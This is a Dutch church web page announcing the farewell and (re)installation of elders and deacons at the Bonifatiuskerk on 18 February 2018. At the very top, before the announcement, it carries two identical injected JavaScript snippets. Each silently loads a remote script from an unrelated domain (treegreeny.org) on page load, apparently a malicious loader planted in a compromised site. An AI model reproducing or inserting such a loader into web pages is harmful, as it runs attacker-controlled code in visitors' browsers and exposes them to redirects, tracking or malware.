;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bevestigingsdienst ambtsdragers Hervormd Akkerwoude c.a. - PKN Damwâld

Bevestigingsdienst ambtsdragers Hervormd Akkerwoude c.a.

Gepubliceerd op: dinsdag 13 februari 2018

We zijn erg blij dat een aantal gemeenteleden aangegeven heeft ambtsdrager te willen worden. In een tijd waarin de mensen het allemaal druk hebben en er veel van ons allemaal wordt gevraagd is het bijzonder dat er mensen zijn die een deel van hun tijd en energie in het gemeentewerk willen steken. Vanuit die gedachte willen we ook de aftredenden ambtsdragers hartelijk bedanken voor hun inzet respectievelijk als ouderling, ouderling-scriba, diaken en ouderling-kerkrentmeester. Dank jullie wel voor alles wat jullie hebben gedaan om het werk in de gemeente voortgang te laten vinden. Het afscheid en de (her-) bevestiging van de ambtsdragers vindt plaats in de dienst van 18 februari a.s in de Bonifatiuskerk. Na afloop van de dienst bent u/ben jij van harte welkom in ’t Skûlplak om de ambtsdragers persoonlijk te bedanken, te feliciteren en Gods zegen toe te wensen. We rekenen op een ieder !